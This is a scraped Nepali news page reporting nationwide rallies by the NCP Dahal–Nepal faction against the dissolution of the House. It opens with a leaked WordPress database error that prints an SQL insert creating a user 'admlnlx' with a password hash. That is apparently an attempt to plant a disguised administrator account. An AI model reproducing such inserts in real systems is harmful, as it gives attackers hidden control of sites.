WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOjcel0Ts1kDI47ZsxQjoIj.jG09ag/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:31:38', '', 'admlnlx', 'admlnlx')

प्रतिनिधिसभा विघटनविरुद्ध दाहाल–नेपाल समूहले देशभर शक्ती प्रदर्शन गर्दै – Gaule Khabar

प्रतिनिधिसभा विघटनविरुद्ध दाहाल–नेपाल समूहले देशभर शक्ती प्रदर्शन गर्दै

प्रतिनिधिसभा विघटनविरुद्ध दाहाल–नेपाल समूहले देशभर शक्ती प्रदर्शन गर्दै

काठमाडौँ । नेकपा (दाहाल–नेपाल) समूहले आज (मंगलबार) प्रतिनिधिसभा विघटनको विरुद्धमा देसभर शक्ति प्रदर्शन गर्दैछ । नेकपा सचिवालय अनुसार यो समूहले काठमाडौंमा मात्रै पचास हजार कार्यकर्ता उतार्ने बताएका छन ।

काठमाडौंमा उपत्यकामा बिहान साढे ११ बजेदेखि विभिन्न ठाउँबाट जुलुुस सुरु भएका छन् । टेकु, नयाँबानेश्वर, कुपन्डोल, लैनचौर र नक्शाल, बागबजार, रत्नपार्कबाट जुलुस सुरु भएका छन् ।

ती जुलुसहरु भृकुटीमण्डपमा जम्मा हुने भएका छन् । भृकुटीमण्डपमा अध्यक्षद्वय पुष्पकमल दाहाल, माधवकुमार नेपाल, वरिष्ठ नेता झलनाथ खनाललगायतले सम्बोधन गर्ने भएका छन् ।

यो समूहको बिहीबार बसेको केन्द्रीय कमिटीको बैठकले प्रधानमन्त्री र राष्ट्रपतिको कदम असंवैधानिक भएको भन्दै पहिलो चरणको कार्यक्रम अन्तर्गत पुस १४ गते देशव्यापी प्रदर्शन गर्ने निर्णय गरेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका